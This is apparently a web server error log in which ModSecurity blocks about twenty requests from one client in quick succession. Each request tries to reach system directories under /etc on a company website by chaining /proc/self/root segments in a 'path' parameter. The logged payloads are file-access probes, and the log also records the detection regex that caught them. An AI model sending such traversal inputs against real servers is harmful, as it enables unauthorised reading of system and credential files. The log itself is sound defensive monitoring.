[Fri Mar 20 06:07:17.095050 2026] [:error] [pid 31215:tid 140411582465792] [client 74.7.243.128:52558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ORQF0L0L-SsrnPo5SGQAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:18.441086 2026] [:error] [pid 11167:tid 140411540502272] [client 74.7.243.128:52564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ORvHIg5MgXLBnicPkEAAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:19.707365 2026] [:error] [pid 11642:tid 140411674785536] [client 74.7.243.128:48126] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OR7ninkcc-iUj5ApIfQAAA4g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:21.049685 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:48130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OSda6ubjKNq_cu4a8wgAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:23.221641 2026] [:error] [pid 11642:tid 140411733534464] [client 74.7.243.128:48140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OSrninkcc-iUj5ApIgQAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:24.669401 2026] [:error] [pid 21219:tid 140411557287680] [client 74.7.243.128:48152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OTPXLqtnMIWvjpaKEcgAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:25.959019 2026] [:error] [pid 21219:tid 140411649607424] [client 74.7.243.128:48168] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OTfXLqtnMIWvjpaKEcwAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:27.344949 2026] [:error] [pid 11642:tid 140411590858496] [client 74.7.243.128:48182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OT7ninkcc-iUj5ApIggAAA5I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:30.712783 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.243.128:48196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OUgF0L0L-SsrnPo5SHQAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:32.010786 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.243.128:51040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OVDJ3M9BSuKP7CAYBbwAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:34.279499 2026] [:error] [pid 9818:tid 140411582465792] [client 74.7.243.128:51042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OVl1pVZ5mVmJwsFMaGAAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:35.534793 2026] [:error] [pid 7893:tid 140411741927168] [client 74.7.243.128:51046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OVxCii7xarUs8iHZSRwAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:36.885973 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.243.128:51060] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OWDJ3M9BSuKP7CAYBdgAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:42.425311 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.243.128:51066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OXvXLqtnMIWvjpaKEewAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:07:45.981217 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.243.128:58630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OYQF0L0L-SsrnPo5SMwAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:07:47.309178 2026] [:error] [pid 9818:tid 140411699963648] [client 74.7.243.128:58634] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OY11pVZ5mVmJwsFMaIgAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:49.659444 2026] [:error] [pid 9818:tid 140411607643904] [client 74.7.243.128:58648] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OZV1pVZ5mVmJwsFMaJQAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:07:50.950569 2026] [:error] [pid 11642:tid 140411607643904] [client 74.7.243.128:41022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OZrninkcc-iUj5ApIkwAAA5A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:52.242196 2026] [:error] [pid 9818:tid 140411624429312] [client 74.7.243.128:41028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OaF1pVZ5mVmJwsFMaJgAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:07:53.543441 2026] [:error] [pid 21219:tid 140411649607424] [client 74.7.243.128:41030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OafXLqtnMIWvjpaKEggAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:08:21.521607 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.243.128:41040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OhfqxLDW4GITHUkTPbQAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:08:22.860069 2026] [:error] [pid 10189:tid 140411632822016] [client 74.7.243.128:47866] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0OhjJ3M9BSuKP7CAYBmgAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
